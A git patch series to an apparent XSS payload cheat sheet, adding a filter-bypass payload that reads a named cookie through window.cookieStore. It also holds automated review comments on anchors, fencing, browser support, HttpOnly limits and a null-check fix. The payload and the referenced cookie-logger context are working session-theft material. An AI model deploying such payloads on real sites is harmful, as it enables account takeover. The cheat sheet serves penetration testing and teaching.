From 5d561ea7d6e726a326a0bc6baecf245327143fb5 Mon Sep 17 00:00:00 2001 From: Cory Cline Date: Thu, 13 Oct 2022 18:23:36 -0500 Subject: [PATCH 1/6] Added document.cookie blacklist bypass Added an alternative to document.cookie for situations when this text is blacklisted. --- XSS Injection/README.md | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 6cb88ea..a079cf6 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -54,6 +54,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Bypass space filter](#bypass-space-filter) - [Bypass email filter](#bypass-email-filter) - [Bypass document blacklist](#bypass-document-blacklist) + - [Bypass document.cookie blacklist](#bypass-document.cookie-blacklist) - [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string) - [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect) - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert) @@ -774,6 +775,14 @@ $ echo "" | xxd window["doc"+"ument"] ``` +### Bypass document.cookie blacklist + +This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements. + +``` +const cookiePromise=Promise.resolve(window.cookieStore.get('COOKIE NAME')).then((cookieValue)=>{console.log(cookieValue.value);}); +``` + ### Bypass using javascript inside a string ```javascript From f23f28c4e235ec35128a05ac8f5cf3af91cf13e3 Mon Sep 17 00:00:00 2001 From: Cory Cline Date: Thu, 13 Oct 2022 18:43:54 -0500 Subject: [PATCH 2/6] Shortened payload Shortened the document.cookie blacklist bypass payload. --- XSS Injection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/XSS Injection/README.md b/XSS Injection/README.md index a079cf6..bbbaaf5 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -780,7 +780,7 @@ window["doc"+"ument"] This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements. ``` -const cookiePromise=Promise.resolve(window.cookieStore.get('COOKIE NAME')).then((cookieValue)=>{console.log(cookieValue.value);}); +Promise.resolve(window.cookieStore.get('COOKIE NAME')).then((cookieValue)=>{console.log(cookieValue.value);}); ``` ### Bypass using javascript inside a string From 9a42be1113d78ba26bc91e6761a595b745e9a2b4 Mon Sep 17 00:00:00 2001 From: Cory Cline Date: Thu, 13 Oct 2022 18:45:55 -0500 Subject: [PATCH 3/6] Replaced console.log with alert It's more common to want alert screenshots vs console screenshots. --- XSS Injection/README.md | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index bbbaaf5..ce1abe9 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -117,7 +117,6 @@ Obtains the administrator cookie or sensitive access token, the following payloa Write the collected data into a file. -```php {console.log(cookieValue.value);}); +Promise.resolve(window.cookieStore.get('COOKIE NAME')).then((cookieValue)=>{alert(cookieValue.value);}); ``` ### Bypass using javascript inside a string From 9ee8f092cd44b73e025eb14bde12425bc2c727b1 Mon Sep 17 00:00:00 2001 From: Cory Cline Date: Thu, 13 Oct 2022 18:46:52 -0500 Subject: [PATCH 4/6] Changed link for document.cookie blacklist Link was not working due to use of period in title. --- XSS Injection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index ce1abe9..2f624de 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md 
@@ -54,7 +54,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Bypass space filter](#bypass-space-filter) - [Bypass email filter](#bypass-email-filter) - [Bypass document blacklist](#bypass-document-blacklist) - - [Bypass document.cookie blacklist](#bypass-document.cookie-blacklist) + - [Bypass document.cookie blacklist](#bypass-document-cookie-blacklist) - [Bypass using javascript inside a string](#bypass-using-javascript-inside-a-string) - [Bypass using an alternate way to redirect](#bypass-using-an-alternate-way-to-redirect) - [Bypass using an alternate way to execute an alert](#bypass-using-an-alternate-way-to-execute-an-alert) From fbed4254e5b04220f57417a496736250a69576cd Mon Sep 17 00:00:00 2001 From: Cory Cline Date: Thu, 13 Oct 2022 18:52:07 -0500 Subject: [PATCH 5/6] Fixed an oops Somehow I deleted line 120 in a prior commit. Fixed. --- XSS Injection/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 2f624de..3c5886f 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -117,6 +117,7 @@ Obtains the administrator cookie or sensitive access token, the following payloa Write the collected data into a file. +```php Date: Thu, 13 Oct 2022 19:48:20 -0500 Subject: [PATCH 6/6] Shortened payload Make payload shorter. --- XSS Injection/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 3c5886f..fb64357 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md 
@@ -780,7 +780,7 @@ window["doc"+"ument"] This is another way to access cookies on Chrome, Edge, and Opera. Replace COOKIE NAME with the cookie you are after. You may also investigate the getAll() method if that suits your requirements. ``` -Promise.resolve(window.cookieStore.get('COOKIE NAME')).then((cookieValue)=>{alert(cookieValue.value);}); +window.cookieStore.get('COOKIE NAME').then((cookieValue)=>{alert(cookieValue.value);}); ``` ### Bypass using javascript inside a string
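Review bot: In the first hunk of PATCH 1/6 (the table-of-contents entry at `@@ -54,6 +54,7 @@`), the anchor `#bypass-document.cookie-blacklist` will not resolve: GitHub builds heading slugs by dropping punctuation such as the period, so the generated id is `bypass-document-cookie-blacklist`. PATCH 4/6 corrects this; squashing that fix into PATCH 1/6 would keep the series from carrying a known-broken link in an intermediate commit.

Review bot: In the second hunk of PATCH 1/6 (`@@ -774,6 +775,14 @@`), the new block uses a bare ``` fence while the neighbouring "Bypass using javascript inside a string" block is tagged ```javascript; tag the new fence the same way for consistent highlighting. The prose should also state the two conditions a reader needs to assess this technique: the Cookie Store API (`window.cookieStore`) is only exposed in secure contexts (HTTPS pages) and, at the time of this change, is absent from Firefox and Safari, which is why only Chrome, Edge and Opera are listed; and, exactly like `document.cookie`, it cannot read cookies flagged `HttpOnly`, so that server-side mitigation is unaffected by this variant. Finally, `cookieStore.get()` resolves to `null` when no cookie of that name exists, so `cookieValue.value` throws a TypeError in that case; a `cookieValue && cookieValue.value` guard (or a note in the text) would avoid a confusing failure.

Review bot: In the hunk of PATCH 3/6 at `@@ -117,7 +117,6 @@`, the deletion of the ```php opening fence (README line 120) is unrelated to the commit's stated purpose ("Replaced console.log with alert") and leaves the PHP cookie-logger block below it unfenced, which breaks rendering of the whole section until PATCH 5/6 restores it. The stat line (1 insertion, 2 deletions) confirms the stray deletion. Suggest squashing PATCH 5/6 into PATCH 3/6 so no commit in the series leaves the README malformed; note also that the second hunk of this patch is truncated in the extracted page, so its context could not be checked here.

Review bot: In the hunk of PATCH 6/6 (`@@ -780,7 +780,7 @@`), dropping `Promise.resolve(...)` is correct since `cookieStore.get()` already returns a promise, but PATCH 2/6 and PATCH 6/6 both carry the subject "Shortened payload" and edit the same line; they would read better as a single commit. The null case from the earlier note still applies to the final form: `window.cookieStore.get('COOKIE NAME').then(c => alert(c.value))` throws when the cookie is absent, so either add the guard or document that the payload assumes the named cookie exists.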